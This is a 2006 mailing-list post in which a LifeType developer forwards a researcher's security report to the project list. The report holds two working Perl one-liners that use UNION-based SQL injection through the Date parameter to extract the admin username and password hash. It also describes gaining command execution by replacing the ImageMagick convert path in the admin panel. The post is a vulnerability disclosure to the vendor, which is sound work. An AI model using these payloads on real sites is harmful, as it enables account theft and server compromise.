[pLog-svn] Fwd: Security problem
Oscar Renalias
oscar at renalias.net
Mon Jul 3 15:57:45 GMT 2006
Can somebody quickly investigate this?
---------- Forwarded message ----------
From: A. Ramos <aramosf at unsec.net>
Date: Jul 3, 2006 5:45 PM
Subject: Security problem
To: contact at lifetype.net
Hello :-)
They are one sql injection in latest version of lifetype:
To get md5 passwd:
perl -MLWP::Simple -e "getprint
'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"
| perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
To get admin username:
perl -MLWP::Simple -e "getprint
'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"
| perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
And if you can access to the admin control panel, you can run commands
in the system changing the value of /usr/bin/convert and put your own
command. Upload some picture and wait to resize with the evil command.
I think they are more bugs but I havent time to check for more.
Thank you.
--
A. Ramos <aka dab>
mailto: <aramosf at unsec.net>
http://www.unsec.net
More information about the pLog-svn
mailing list